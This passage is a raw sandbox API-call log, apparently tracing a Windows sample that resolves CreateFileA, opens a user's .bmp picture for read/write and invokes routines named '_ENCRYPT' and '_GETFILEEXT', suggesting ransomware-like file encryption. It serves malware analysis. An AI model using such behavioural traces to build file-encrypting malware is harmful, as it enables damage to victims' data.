[0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd360 [0189.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd360, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.110] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0189.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd360, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.110] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0189.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x55) returned 0x8c4a48 [0189.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", cchWideChar=85, lpMultiByteStr=0x8c4a48, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpUsedDefaultChar=0x0) returned 85 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.112] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\cnlxkqk1zng.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=85, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaa) returned 0x8e6e48 [0189.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=85, lpWideCharStr=0x8e6e48, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp") returned 85 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.115] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.116] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.116] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.116] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.116] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.116] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.116] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.117] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.117] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.117] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.117] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.117] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.117] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.117] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.117] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0x90add8 [0189.117] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.118] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0x90add8 [0189.118] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.118] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 